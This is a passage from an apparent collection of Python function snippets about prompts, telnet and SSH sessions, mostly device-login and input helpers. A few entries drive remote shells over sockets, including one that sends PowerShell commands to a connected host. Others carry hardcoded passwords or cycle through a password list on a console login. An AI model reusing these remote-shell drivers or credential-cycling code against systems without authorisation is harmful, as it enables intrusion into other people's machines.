self.close()\r\n return False\r\n return True", "def enter_repl(self):\n text_input = ''\n while True:\n text_input = input('>>')\n if text_input == 'exit':\n break\n #An alias for querying an instrument error string\n elif text_input == 'err?':\n self.write_to_serial(':SYST:ERR?')\n print(self.read_from_serial())\n else:\n self.write_to_serial(text_input)\n print(self.read_from_serial())", "def send_recv_session(self, fillin):\n prompts = self.session_params[\"prompts\"]\n timeout = self.session_params[\"timeout\"]\n add_eol = self.session_params[\"add_eol\"]\n func = self.session_params[\"out_func\"]\n\n if fillin is not None:\n self.session.send(fillin.encode(\"utf-8\"))\n if add_eol and not fillin.endswith('\\n'):\n self.session.send(\"\\n\".encode(\"utf-8\"))\n\n buff = ''\n begin = time.perf_counter()\n while True:\n try:\n resp = self.session.recv(9999)\n except socket.timeout:\n resp = b\"\"\n dec = resp.decode(\"unicode_escape\")\n buff += dec\n for p in prompts:\n if buff.endswith(p):\n break\n if time.perf_counter() - begin > timeout:\n break\n\n return func(buff.replace(\"\\r\", \"\"))", "def do_prompt(self, line):\n self.prompt = line + ': '", "def login(self, asRoot=True):\n self.pc = Telnet(self.ipaddr)\n self.pc.expect(['login'])\n self.pc.write(self.user+'\\n')\n self.pc.expect(['Password'])\n self.pc.write(self.passwd+'\\n')\n ix, ox, tx = self.pc.expect(self.prompt, self.timeout)\n if ix == -1:\n raise Exception('Can not telnet to \\'%s\\'' %self.ipaddr)", "def do_prompt(self, line):\n if line:\n self.prompt = \"(%s) \" %line\n\n else:\n print 'Please specify a prompt text'", "def consolePrompt(prompt:str, nl:bool = True, default:str = None) -> str:\n\t\tanswer = None\n\t\ttry:\n\t\t\tanswer = Prompt.ask(f'[{Logging.terminalStyle}]{prompt}', console = Logging._console, default = default)\n\t\t\tif nl:\n\t\t\t\tLogging.console()\n\t\texcept KeyboardInterrupt as e:\n\t\t\tpass\n\t\texcept Exception:\n\t\t\tpass\n\t\treturn answer", "def interact(self):\n print('Ready to interact on socket connected with {}.'.format(self.remote_addr))\n try:\n # get initial input from user\n print('Enter input or press CTRL-D for no input.')\n data = sys.stdin.readline()\n self.remote_socket.sendall(data.encode())\n while True:\n if data.startswith('exit'):\n print('[*] Closing remote shell.')\n self.close()\n break\n # wait for response from target host\n recv_len = 1\n response = ''\n while recv_len:\n data = self.remote_socket.recv(4096)\n recv_len = len(data)\n response += data.decode()\n if recv_len < 4096:\n break\n print(response)\n # get further input from user\n print('Enter further input or press CTRL-D for no input.')\n data = sys.stdin.readline()\n self.remote_socket.sendall(data.encode())\n except Exception as e:\n print(e)\n print('[*] Closing remote shell.')\n self.close()", "def _on_connect(self, stream_reader, stream_writer):\n # Sometimes the remote side doesn't send the newline for the first\n # prompt. This causes our prompt matching to fail. Here we inject a\n # newline to normalize these cases. This keeps our prompt processing\n # simple.\n super().data_received(b\"\\n\")\n self._session._session_connected(stream_reader, stream_writer)", "def prompt (self, timeout=20):\r\n i = self.expect([self.PROMPT, TIMEOUT], timeout=timeout)\r\n if i==1:\r\n return False\r\n return True", "async def connectTelnet(self):\n\n # Display info message\n log.info(\"connectTelnet\")\n\n try:\n\n # Prepare connection with Telnet\n conn = asyncio.open_connection(self.ip, self.port)\n\n except Exception as error:\n\n # Preparation to the connection failed\n\n # Display error message\n log.error(f\"connectTelnet: preparation to the connection failed: '{error}'\")\n\n # Exception propagation\n raise\n\n # Display info message\n log.info(\"connectTelnet: preparation to the connection success\")\n\n try:\n\n # Connection with Telnet\n self._reader, self._writer = await asyncio.wait_for(\n conn, timeout=self.timeout\n )\n\n except asyncio.TimeoutError:\n\n # Time out during connection\n\n # Display error message\n log.error(\"connectTelnet: connection: timeout\")\n\n # Exception propagation\n raise\n\n # Display info message\n log.info(\"connectTelnet: connection success\")\n\n # Get prompt for the login\n prompt = self._telnet_connect_login\n\n # Get prompt for the password\n prompt_password = self._telnet_connect_password\n\n # By default a login is expected\n use_login = True\n\n # Temporary string variable\n output = \"\"\n\n # Temporary bytes variable\n byte_data = b\"\"\n\n # Read the telnet information and first prompt (for login but a password prompt can be found for IOS for instance)\n while True:\n\n # Display info message\n log.info(f\"connectTelnet: read data for prompt\")\n\n # Read returned prompt\n byte_data += await asyncio.wait_for(\n self._reader.read(MAX_BUFFER_DATA), timeout=self.timeout\n )\n\n # Display info message\n log.info(f\"connectTelnet: byte_data: {byte_data}\")\n\n # Temporary convertion in string. This string has the following form: \"b'....'\"\n output = str(byte_data)\n\n # Display info message\n log.info(f\"connectTelnet: output: {output}\")\n\n # Prompt for the username found?\n if prompt in output:\n\n # Yes\n\n # Leave the loop\n break\n\n # Prompt for the password found?\n elif prompt_password in output:\n\n # Yes\n\n # That means only password is required\n use_login = False\n\n # Leave the loop\n break\n\n # Display info message\n log.info(f\"connectTelnet: login prompt: '{output}'\")\n\n # Login to use?\n if use_login:\n\n # Yes\n\n # Display info message\n log.info(\"connectTelnet: sending login\")\n\n try:\n\n # Send login\n await self.send_command(self.username, prompt_password)\n\n # Display info message\n log.info(\"connectTelnet: login sent\")\n\n except Exception:\n\n # Problem with the login\n\n # Propagate the exception\n raise\n\n # Display info message\n log.info(\"connectTelnet: sending password\")\n\n try:\n # Send password\n output = await self.telnet_send_command_with_unexpected_pattern(\n self.password,\n self._connect_first_ending_prompt,\n self._telnet_connect_authentication_fail_prompt,\n )\n\n except Exception:\n\n # Problem with the password\n\n # Propagate the exception\n raise\n\n # Display info message\n log.info(\"connectTelnet: password sent\")\n\n # Find prompt\n self.prompt = self.find_prompt(str(output))\n\n # Display info message\n log.info(f\"connectTelnet: prompt found: '{self.prompt}'\")\n\n # Password enable?\n if self.enable_mode:\n\n # Yes\n\n # Display info message\n log.info(\"connectTelnet: enable mode to be activated\")\n\n try:\n\n # Send enable command\n await self.send_command(self.cmd_enable, prompt_password)\n\n # Display info message\n log.info(\"connectTelnet: enable command sent\")\n\n # Display info message\n log.info(\"connectTelnet: sending enable password\")\n\n # Send enable password\n await self.telnet_send_command_with_unexpected_pattern(\n self.enable_password,\n self._connect_first_ending_prompt,\n self._telnet_connect_authentication_fail_prompt,\n )\n\n # Display info message\n log.info(\"connectTelnet: enable password sent\")\n\n except Exception:\n\n # Problem with the enable password\n\n # Display info message\n log.info(\"connectTelnet: enable password failure\")\n\n # Propagate the exception\n raise\n\n # Disable paging command available?\n if self.cmd_disable_paging:\n\n # Yes\n\n # Disable paging\n await self.disable_paging()", "async def interactive_shell(self) -> None:\n session = PromptSession()\n while True:\n try:\n result = await session.prompt_async(f\"redCisco> \", style=style)\n if not result:\n continue\n await self.command_interpreter(str(result).strip())\n except (EOFError, KeyboardInterrupt):\n break", "def query(self, *parameters):\n telnet = telnetlib.Telnet(self.host, self.port)\n if self._username and self._password:\n telnet.write('login {username} {password}\\n'.format(\n username=self._username,\n password=self._password).encode('UTF-8'))\n telnet.read_until(b'\\n', timeout=3)\n message = '{}\\n'.format(' '.join(parameters))\n telnet.write(message.encode('UTF-8'))\n response = telnet.read_until(b'\\n', timeout=3)\\\n .decode('UTF-8')\\\n .split(' ')[-1]\\\n .strip()\n telnet.write(b'exit\\n')\n return urllib.parse.unquote(response)", "def login_aashell(self):\n flag = 0\n login_aashell = 'telnet 192.168.255.1 15007'\n aashell_prompt = 'AaShell>'\n\n self._current.write(login_aashell)\n self._current.read_until_regexp(aashell_prompt)\n flag = 1\n\n return flag", "def input(self, prompt):\r\n return console_input(prompt)", "def prompt(promptstring='>'):\n class PromptWithString(Prompt):\n def __init__(self, document, callback=None):\n Prompt.__init__(self, document, callback)\n self.promptstring = promptstring\n return PromptWithString", "def _postConnect(self):\n\n #timeout = 5\n p = self.spawnProc\n list = [self.prompt,\"ssh:\", \"[Pp]assword: \", \"\\? \", \n\n\t \"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\", \n pexpect.EOF,pexpect.TIMEOUT]\n \n match = p.expect(list,self.sshTimeout )\n #prompt\n if (match == list.index(self.prompt)) : \n # got a prompt, want to save the prompt chunk so we can use\n # it later to trim command output. do this by sending a\n # \\r and cultivating the bare prompt.\n p.sendline(\"\")\n p.expect(self.prompt)\n self._extractPChunk(p.before)\n\t # ssh error message\n elif (match == list.index(\"ssh:\")): \n # TODO: send the ssh error text in the exception\n msg = \"Error occured while executing ssh command \"\n raise SessionManagerException,msg\n\t # passwd prompt\n elif match == 2: \n \n\t msg = \"ssh command got 'Password:' prompt,\"\n p.sendline(\"shipped!!\")\n\t try:\n p.expect(self.prompt,self.sshTimeout)\n self._extractPChunk(p.before)\n\t except pexpect.TIMEOUT:\n print msg\n raise SessionManagerException,msg\n # connect confirmation prompt\n elif match == 3: \n p.sendline(\"yes\")\n p.expect(list[2])\n p.sendline(\"shipped!!\")\n\t try:\n p.expect(self.prompt,self.sshTimeout)\n self._extractPChunk(p.before)\n\t except pexpect.TIMEOUT:\n msg = \"ssh login confirmation problem\"\n msg = msg + \" Key exchange not successful \"\n\t\tprint msg\n raise SessionManagerException,msg\n\n self._extractPChunk(p.before)\n\t\n # Remote host identification change \n elif match == 4: \n msg = \"Remote host identification change: check ~/.ssh/known_hosts file\"\n raise SessionManagerException, msg\n # Unexpected Prompt while trying to connect \n elif match == 5: \n msg = \"ssh got unexpected prompt, did not establish connection\"\n raise SessionManagerException, msg\n \n # Timeout Error \n elif (match == list.index(pexpect.TIMEOUT)):\n msg = 'ssh to %s timed out' % self.args\n raise SessionManagerException, msg", "def recv_to_prompt(self):\n buf = \"\"\n while True:\n ibuf = self._channel.recv(65536)\n buf += ibuf\n if ibuf.endswith(\"$ \") or ibuf.endswith(\"# \"):\n break\n\n lbuf = buf.splitlines()\n return lbuf[1:-1]", "def __clear_telnet_port(self, console_ip, port):\n logging.info(\"Clearing console with ip=%s and ports=%s\", console_ip, port)\n pwdList = ['cisco123', 'lab', 'nbv123']\n pwdList.remove(self.console_pwd)\n pwdTry = 0\n console = pexpect.spawn('telnet %s'%(console_ip))\n console.logfile = self.log\n i = console.expect([pexpect.TIMEOUT, pexpect.EOF, r'Bad', r'(?i)incorrect', PWD_PROMPT, CONSOLE_PROMPT, EN_CONSOLE_PROMPT], 5)\n while i >= 0:\n if i == 0:\n console.close()\n raise TimeoutError('Clear Console Timeout error')\n if i == 1:\n console.close()\n raise EofError('Clear Console EOF error')\n if i == 2 or i == 3:\n console.close()\n raise PasswordError('Clear Console, Password error')\n if i == 4:\n logging.info(\"pwd %s\", self.console_pwd)\n if pwdTry == 0:\n console.sendline(self.console_pwd)\n elif pwdTry > 0 and pwdTry <= len(pwdList):\n console.sendline(pwdList[pwdTry - 1])\n self.console_pwd = pwdList[pwdTry-1]\n else:\n console.close()\n raise PasswordError('Clear Console, Password error')\n pwdTry = pwdTry + 1\n if i == 5:\n logging.info(\"console prompt\")\n Utils.update_console_login_details(self.switch_name, self.console_user, self.console_pwd)\n console.sendline('en')\n console.expect(PWD_PROMPT)\n console.sendline(self.console_pwd)\n if i == 6:\n logging.info(\"en console prompt\")\n Utils.update_console_login_details(self.switch_name, self.console_user, self.console_pwd)\n break \n i = console.expect([pexpect.TIMEOUT, pexpect.EOF, r'Bad', r'(?i)incorrect', PWD_PROMPT, CONSOLE_PROMPT, EN_CONSOLE_PROMPT], 5)\n \n po = int(port)%100\n console.sendline('clear line %d'%(po))\n console.sendline('\\r')\n console.expect('confirm')\n console.sendline('\\r')\n console.expect(EN_CONSOLE_PROMPT)\n console.sendline('exit')\n time.sleep(1)\n console.close()\n return", "def prompt_base(prompt):\n return input(prompt + \": \")", "def run_cmd(server, client):\n msg = [client.get_command()]\n client.input_list += msg\n server.logger.info(\"RECEIVED INPUT {} : {}\".format(client.ip, msg[0]))\n if not client.username or not client.password:\n server.login_screen(client, msg)\n return\n loop_cmds(server, client, msg[0].split(';'))\n server.return_prompt(client)", "def SendCmd(self, command):\r\n if not self.__CheckConnectStatus():\r\n print \"Non telnet connection!\"\r\n return False\r\n\r\n if command == None or command == False:\r\n print \"No valid command to run.\"\r\n return True\r\n else:\r\n command = str(command) + \"\\r\\n\"\r\n print self.prompt + command\r\n \r\n try:\r\n self.tn.read_very_eager() \r\n self.tn.write(command)\r\n p_Output = self.tn.read_until(self.prompt, self.timeout)\r\n print p_Output\r\n return p_Output\r\n\r\n except:\r\n print \"Write command failure\"\r\n return False", "def prompt(self, task, text='', print_=False):\n template = self.prompts[task]['prompt']\n res = self.format_prompt(task, template, text)\n if print_:\n print(res)\n else:\n return res", "def _execute(self, command):\n \"\"\"\n Confirm the command was correctly echoed back and then ask for\n its return code\n \"\"\"\n self.telnet_client.write((command + \"\\r\\n\").encode())\n resp = self.telnet_client.read_until((command + \"\\r\\n\").encode())\n while True:\n resp = self.telnet_client.read_until(self.prompt.encode())\n if resp is not None:\n break\n\n stdout = resp.decode()\n stderr = \"\"\n self.telnet_client.write(\"echo $?\\r\\n\".encode())\n _, match, _ = self.telnet_client.expect([re.compile(br'(\\d+)')],\n TelnetControl.TELNET_TIMEOUT)\n exit_code = int(match.group(1).decode())\n\n if exit_code != 0:\n stderr = resp.decode()\n return exit_code, stdout, stderr", "def on_start(self, session):\n self.put_prompt(session)", "def prompt_ip(prompt):\n response = \"\"\n while not is_valid_ip(response):\n response = prompt_base(prompt)\n return response", "def run(self, cmd, exp='', timeout=60):\n if not self.connected(): return (False, list())\n\n clist = cmd.split()\n\n # disable paing and echo would simplify parsing\n self.set_paging_status(False)\n self.set_echo_status(False)\n\n # do not allow paging and echo and prompt command\n if clist[0] == 'paging' or clist[0] == 'echo' or clist[0] == 'prompt':\n return (True, list())\n\n\n if not exp:\n # prompt will be inserted by middle commands, so replace with '.*'\n exp = [(self.prompt[:-2] + '.*# ').encode('ascii')]\n\n if not isinstance(exp, list):\n exp = [exp]\n\n # capture this if paging status is enabled by user command unexpectedly\n exp.append(br'more\\? y=\\[yes\\] q=\\[quit\\].*')\n\n try:\n self.write(cmd + '\\n')\n res = list()\n while True:\n resp = self.tn.expect(exp, timeout)\n if resp[0] == -1:\n sys.stderr.write(self.ne + \": \" + cmd + \" no resp\\n\")\n return (False, list())\n elif resp[0] == (len(exp) - 1): # paging\n # remove the the tailline(which is paging indication) \n res += resp[2].decode('ascii').splitlines()[:-1]\n self.write(b'y')\n else:\n res += resp[2].decode('ascii').splitlines()\n break\n except:\n sys.stderr.write(self.ne + \": \" + cmd + \" FAIL\\n\")\n self.close()\n return (False, list())\n\n # remove tailline(which is prompt)\n return (True, list(filter(None, res[:-1])))", "def prompt(question):\n print('\\n')\n while True:\n reply = str(input(question+' (y/n): ')).lower().strip()\n if reply[:1] == 'y':\n return True\n if reply[:1] == 'n':\n return False", "def prompt(msg):\n # remove non-blocking mode\n fd = sys.stdin.fileno()\n flags = fcntl.fcntl(fd, fcntl.F_GETFL, 0)\n flags = flags & ~os.O_NONBLOCK\n fcntl.fcntl(fd, fcntl.F_SETFL, flags)\n return raw_input(msg)", "def ask_password(self, prompt: str) -> str:\n raise NotImplementedError", "def get_user_input(self):\n while not self.suspended:\n input = raw_input()\n input = input.split('|')\n if input[0] in ['exit', 'quit', 'kill']:\n self.broadcast('kill')\n self.suspended = True\n for client in self.clients.values():\n client.socket.close()\n self.s.close() # Have to connect to socket to exit server.\n sock = socket(AF_INET, SOCK_STREAM)\n port = bind_to_random(sock)\n sock.connect((str(self.ip), self.port))\n elif len(input) > 1:\n msg = '|'.join(['#server']+input[1:])\n if input[0][:1] == '@':\n destination = input[0][1:].lower()\n if destination == 'server':\n print msg\n elif destination == 'all':\n self.broadcast(msg)\n else:\n client = self.clients.get(destination, None)\n if client:\n client_send(client.socket, msg)\n else:\n print 'Destination not active'\n else:\n print msg", "def prompt(self, question):\n self.output(' ')\n self.output(question)\n self.output(self.parse_response(str(self.ui())))", "def speech_response_prompt(output, reprompt_text, endsession):\n\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': endsession\n }", "def speech_response_prompt(output, reprompt_text, endsession):\n\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': endsession\n }", "def test_strip_prompt():\n string = \"\"\"MyRouter version 1.25.9\nmyhostname>\"\"\"\n connection = FakeBaseConnection(RESPONSE_RETURN=\"\\n\", base_prompt=\"myhostname>\")\n result = connection.strip_prompt(string)\n assert result == \"MyRouter version 1.25.9\"", "def __init__(self, hostname, login_password, admin_password, port=23):\n # Connect first.\n connection.TelnetConnection.__init__(self, hostname, port)\n handle = self.get_handle()\n\n # Then authenticate.\n try:\n handle.read_until(\"Password: \", _LOGIN_TIMEOUT)\n handle.write(login_password + \"\\n\")\n\n handle.read_until(\">\", _LOGIN_TIMEOUT)\n handle.write(\"enable\\n\")\n\n handle.read_until(\"Password: \", _LOGIN_TIMEOUT)\n handle.write(admin_password + \"\\n\")\n\n handle.read_until(\"#\", _LOGIN_TIMEOUT)\n handle.write(\"terminal length 0\\n\")\n handle.read_until(\"#\", _LOGIN_TIMEOUT)\n\n except Exception, err:\n raise connection.AuthenticationFailed(err)", "def textinput(self, title, prompt):\n return simpledialog.askstring(title, prompt)", "def prompt(self):\n return input(self.message + \": \").strip()", "def ask(prompt):\n\n return renpy.exports.invoke_in_new_context(renpy.store.layout.yesno_prompt, None, prompt)", "def input_timeout(prompt: str, t_timeout: [float, int] = 30, default: str = None) -> str:\n print(prompt, end=\" \")\n rlist, _, _ = select.select([sys.stdin], [], [], t_timeout)\n\n if not rlist:\n if default is None:\n raise RuntimeError(f\"No input received within {t_timeout}s!\")\n else:\n return default\n\n return sys.stdin.readline().strip()", "def connect_new_ssh(child, password):\n child.sendline('yes');\n index = child.expect('password: ');\n if index == 0:\n child.sendline(password);", "def auto_connect(address):\r\n _connected=False\r\n _timeout=100\r\n _count = 0\r\n\r\n while not _connected:\r\n try:\r\n _c = telnetlib.Telnet(address)\r\n if _c.sock is not None:\r\n _connected = True\r\n\r\n except socket.error:\r\n _count = _count + 1\r\n print \"Trima socket not ready, waiting to retry, attempt #\"+str(_count)\r\n time.sleep(5)\r\n\r\n print(\"Trima Telnet Connection Ready\")", "def _prompt(letters='yn', default=None):\n while True:\n try:\n input_text = sys.stdin.readline().strip()\n except KeyboardInterrupt:\n sys.exit(0)\n if input_text and input_text in letters:\n return input_text\n if default is not None and input_text == '':\n return default\n print('Come again?')", "def shell(s_socket):\r\n shellname = \"powershell\"\r\n bytes_value = to_bytes(len(shellname), 4, 'little')\r\n s_socket.send('o' + bytes_value + shellname)\r\n value = raw_input(shellname + \"#> \")\r\n while True:\r\n bytes_value = to_bytes(len(value), 4, 'little')\r\n s_socket.send('s' + bytes_value + value)\r\n print(s_socket.recv(20000))\r\n\r\n if 'exit' in value:\r\n break\r\n\r\n value = raw_input(shellname + \"#> \")", "def prompt(self):\n self.prompt_flag = True", "def prompt_for_mail_client():\n answ = raw_input(\"\\nOpen default client with above message? (y/n) \").lower()\n if not answ or answ not in [\"y\",\"n\"]:\n print \"Please answer 'y' or 'n'.\"\n return prompt_for_mail_client()\n elif answ == \"y\":\n return True\n else:\n return False", "def input_with_timeout(prompt: Optional[str] = None, timeout: float = 36000.0) -> str:\n # use of sys.stdin and sys.stdout to mimic the builtin input based on\n # https://github.com/python/cpython/blob/baf7bb30a02aabde260143136bdf5b3738a1d409/Lib/getpass.py#L129\n if prompt:\n sys.stdout.write(prompt)\n sys.stdout.flush()\n\n line = misc.readline_with_timeout(timeout, prompt)\n\n if not line:\n raise EOFError\n return line.rstrip('\\n')", "def _ask_prompt(question: str,\n console: io.IO,\n validate: Optional[Callable[[str], None]] = None,\n default: Optional[str] = None) -> str:\n validate = validate or (lambda x: None)\n while True:\n answer = console.ask(question)\n if default and not answer:\n answer = default\n try:\n validate(answer)\n break\n except ValueError as e:\n console.error(e)\n\n return answer", "def prompt():\n sys.stdout.write('>> ')\n sys.stdout.flush()", "def take_pass(text_to_prompt):\r\n return prompt(text_to_prompt, is_password=True)", "def ask_input(self, prompt):\n self._vim.command('call inputsave()')\n self._vim.command('let user_input = input(\"{} \")'.format(prompt))\n self._vim.command('call inputrestore()')\n response = self._vim.eval('user_input')\n self._vim.command('unlet user_input')\n return response", "def prompt(self):\r\n super().prompt_number()\r\n self.email = str(input(\"Email: \"))", "def get_prompt(self, timeout=30):\n #self.tc.expect(self.tool_prompt, timeout=timeout)\n #self.tf = self.tc.after.split()\n #return {'status': int(self.tf[self.tool_status_index]), 'output': self.tc.before}\n output = \"\"\n # Loop until we receive the special spt prompt while in pipe mode.\n while True:\n line = self.tc.stdout.readline()\n if re.search(self.tool_prompt, line):\n self.tf = line.split()\n break\n elif not len(line):\n # We've reached EOF or spt exited abnormally, usually a core dump!\n raise RuntimeError\n else:\n output += line\n #if self._debug:\n # print('Response: {0}'.format(self.tf))\n # print('Output: {0}'.format(output), end=None)\n #import pdb; pdb.set_trace()\n return {'status': int(self.tf[self.tool_status_index]), 'output': output}", "def reply_request(question: str, reply_options = ['y', 'yes', 'n', 'no'], show_reply = False):\n\n reply = None \n while not reply in reply_options:\n reply = input(question).lower()\n else:\n if show_reply:\n print(f'Your choice: {reply}')\n \n if reply in ['yes', 'no']:\n return reply[0]\n else:\n return reply", "def new_prompt(self, prompt):\n self._input_state = 'readline'\n ConsoleWidget.new_prompt(self, prompt)\n i = self.current_prompt_line\n self._markers[i] = self.MarkerAdd(i, _INPUT_MARKER)", "def process_ask_configs(config):\n\n if config.confluence_ask_user:\n print('(request to accept username from interactive session)')\n print(' Instance: ' + config.confluence_server_url)\n\n default_user = config.confluence_server_user\n u_str = ''\n if default_user:\n u_str = ' [{}]'.format(default_user)\n\n target_user = compat.input(' User{}: '.format(u_str)) or default_user\n if not target_user:\n raise ConfluenceConfigurationError('no user provided')\n\n config.confluence_server_user = target_user\n\n if config.confluence_ask_password:\n print('(request to accept password from interactive session)')\n if not config.confluence_ask_user:\n print(' Instance: ' + config.confluence_server_url)\n print(' User: ' + config.confluence_server_user)\n sys.stdout.write(' Password: ')\n sys.stdout.flush()\n config.confluence_server_pass = util.getpass2('')\n if not config.confluence_server_pass:\n raise ConfluenceConfigurationError('no password provided')", "def test_strip_no_prompt():\n string = \"\"\"MyRouter version 1.25.9\nadditional text\"\"\"\n connection = FakeBaseConnection(RESPONSE_RETURN=\"\\n\", base_prompt=\"myhostname>\")\n result = connection.strip_prompt(string)\n assert result == string", "def establish_connection(self):\r\n\r\n #creates SSH connection and adds SSH key to .known_hosts\r\n self.ssh_conn = paramiko.SSHClient()\r\n self.ssh_conn.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n\r\n try:\r\n self.ssh_conn.connect(**self.conn_parm)\r\n print \"Connected to %s\" % self.conn_parm['hostname']\r\n #testing: self.ssh_conn.close()\r\n except socket.error:\r\n print \"Connection Failed on device %s\" % self.conn_parm['hostname']\r\n\r\n #find prompt\r\n open_session = self.ssh_conn.invoke_shell()\r\n output = open_session.recv(1000)\r\n\r\n #testing: print output\r\n\r\n #go into Enable-Mode if not already in it\r\n if '#' not in output:\r\n open_session.send('enable\\n')\r\n time.sleep(1)\r\n open_session.send(self.password)\r\n open_session.send('\\n')\r\n else:\r\n print \"In Enable-Mode\"\r\n\r\n #turn off paging\r\n open_session.send('terminal length 0\\n')\r\n time.sleep(3)\r\n \r\n return open_session", "def ask(self):\n subprocess.run([\"say\", \"-v\", \"Kyoko\", str(self.answer)])", "def __init__(self, node):\n # _session will hold the underlying pexpect session handle\n self._session = None\n self.alias = node[\"alias\"]\n self.ip = node[\"ip\"]\n self.password = node[\"password\"]\n self.port = node[\"port\"]\n self.connection_type = node[\"connection\"]\n self.info = node # Store the raw testbed information\n self.promptuser = r\"[\\r\\n][^\\r\\n]* # \"\n self.promptshell = r\"\\[(root|admin)\\@[\\.a-zA-Z0-9-]+ [\\~]+\\]\\# \"\n\t\n self.prompts = {\n \"user\" : re.compile(self.promptuser),\n CLI_MODES.shell : re.compile(self.promptshell),\n }\n self.promptmore = re.compile(r\"lines \\d+-\\d+\")\n self._mode = None\n self._mode_stack = []\n self.connect()", "def prompt_for_credentials(realm, uri, user, password):\n\n try:\n if realm is None:\n realm = raw_input('Realm: ')\n if uri is None:\n uri = raw_input('URI: ')\n if user is None:\n user = raw_input('Username: ')\n if password is None:\n password = getpass.getpass()\n\n return realm, uri, user, password\n except KeyboardInterrupt:\n print\n return None, None, None, None", "def test_prompt_msg_newline_withask_fails(self):\n self.expected['failed'] = True\n self.expected['msg'] = \"Option 'newline' is not compatible with option 'ask'.\"\n\n self.assertEquals(\n self.prompt._prompt(self.response, {\n \"ask\": \"test_var\",\n \"newline\": False\n }),\n self.expected\n )", "def prompt_selection(self,\r\n prompt_text: str,\r\n validate: Union[Callable[[str], Optional[Any]], partial],\r\n default: Any) -> Any:\r\n while True:\r\n try:\r\n if self.__use_standard_console:\r\n user_input = prompt(prompt_text)\r\n else:\r\n user_input = self.__alt_prompt(prompt_text)\r\n except KeyboardInterrupt:\r\n return default\r\n if user_input == '':\r\n return default\r\n user_input = validate(user_input)\r\n if user_input is not None:\r\n break\r\n return user_input", "def echo_client(host, port):\n # Create a TCP/IP socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # Connect the socket to the server\n server_address = (host, port)\n print \"Connecting to %s port %s\" % server_address\n sock.connect(server_address)\n\n while True:\n # Send data\n try:\n # Send data\n # message = raw_input()\n # print \"Sending %s\" % message\n # sock.sendall(message)\n # # Look for the response\n message = raw_input('\\ncontinue receive data? [Y / N]')\n sendata = raw_input('send something?\\n')\n if sendata is not None:\n sock.sendall(sendata)\n if message == 'N' or message == 'n':\n break\n \n data = sock.recv(1024)\n sock.sendall('reply:'+data)\n print(\"Received: %s\" ) % data\n except socket.errno, e:\n print \"Socket error: %s\" %str(e)\n except Exception, e:\n print \"Other exception: %s\" %str(e)\n # finally:\n # print \"Closing connection to the server\"\n # # sock.close()\n print('end connection\\n')\n sock.close()", "def client_leaving(self, telnet_connection):", "def _password_prompt(question: str, console: io.IO) -> str:\n console.tell(question)\n while True:\n password1 = console.getpass('Password: ')\n try:\n _password_validate(password1)\n except ValueError as e:\n console.error(e)\n continue\n password2 = console.getpass('Password (again): ')\n if password1 != password2:\n console.error('Passwords do not match, please try again')\n continue\n return password1", "def TerminalClientStart(self):\n pass", "def interactive(self, handle_message=None, context=None):\n if context is None:\n context = {}\n\n history = InMemoryHistory()\n while True:\n try:\n message = prompt(INTERACTIVE_PROMPT, history=history, mouse_support=True).rstrip()\n except (KeyboardInterrupt, EOFError):\n return\n if handle_message is None:\n print(self.message(message, context))\n else:\n print(handle_message(self.message(message, context)))", "def _prompt(prompt):\n return raw_input(\"%s [yes or no]: \" % prompt) == \"yes\"", "def connect(self, cmd, window, **kwargs):\n try:\n kwargs['server']\n except KeyError:\n window.server_event('/%s syntax: /%s servername [port] [nickname]' % cmd)\n return\n try:\n kwargs['port']\n try: \n int(kwargs['port'])\n except ValueError:\n raise KeyError\n except KeyError:\n kwargs['port'] = 6667\n try:\n kwargs['nickname']\n except KeyError:\n kwargs['nickname'] = \"circe\"\n self.connection.connect(**kwargs)", "def __window_prompt(self, text):\n return True", "def _prompt(letters='yn', default=None):\n\n import sys\n while True:\n try:\n inputstr = sys.stdin.readline().strip()\n except KeyboardInterrupt:\n sys.exit(0)\n if inputstr and inputstr in letters:\n return inputstr\n if default is not None and inputstr == '':\n return default\n print 'Come again?'", "def do_ospfd(self, line):\n try:\n self.fibbing[line].call('telnet', 'localhost', '2604')\n except KeyError:\n log.error('Unknown node %s', line)", "def interact(self):\n if not self.connected(): return\n\n try:\n if sys.platform == 'win32':\n import msvcrt\n else:\n import tty, termios\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n tty.setraw(fd)\n\n self.start_listener()\n self.start_anti_idle_timer()\n\n sys.stdout.write(self.prompt)\n\n pre_ch = b''\n while True:\n if sys.platform == 'win32':\n ch = msvcrt.getch()\n if ch == b'\\xe0':\n ch = b'\\x1b'\n if pre_ch == b'\\x1b':\n if ch == b'K': ch = b'[D' # left arrow\n elif ch == b'M': ch = b'[C' # right arrow\n elif ch == b'H': ch = b'[A' # up arrow\n elif ch == b'P': ch = b'[B' # down arrow\n else:\n ch = sys.stdin.read(1)\n if not ch:\n break\n if not self.connected():\n break\n\n self.write(ch)\n pre_ch = ch\n\n if not self.connected():\n break\n finally:\n if sys.platform != 'win32':\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n self.cancel_anti_idle_timer()", "def copeWithInput(self, s):\n \n if self.debug > 5:\n CPL.log('TCCShell.copeWithInput', \"Nub %s read: %r, with buf=%r\" % (self.name, s, self.inputBuffer))\n\n while 1:\n # Connections to the TCC's tccuser captive account return lines\n # terminated by CRLF, but with the LF coming at the start of the \"next\n # line\". Odd, and to be investigated. In the meanwhile, strip leading LFs\n #\n if len(self.inputBuffer) > 0 and self.inputBuffer[0] == '\\n':\n self.inputBuffer = self.inputBuffer[1:]\n \n reply, leftover = self.decoder.decode(self.inputBuffer, s)\n s = None\n if self.debug > 5:\n CPL.log('TCCShell.copeWithInput', \"decoded: %s, yielding buf=%r\" % (reply, leftover))\n\n self.inputBuffer = leftover\n if not reply:\n break\n\n if self.log:\n try:\n txt = reply['RawText']\n except:\n txt = \"UNKNOWN INPUT\"\n self.log.log(txt, note='<')\n \n # Here's the special TCC bit: search for YourUserNum, \n if self.cid == None:\n newCID = self.findUserNum(reply['KVs'])\n if newCID != None:\n self.cid = newCID\n CPL.log('TCCShell.copeWithInput', \"setting CID=%s\" % (self.cid))\n self.connected()\n \n cmd 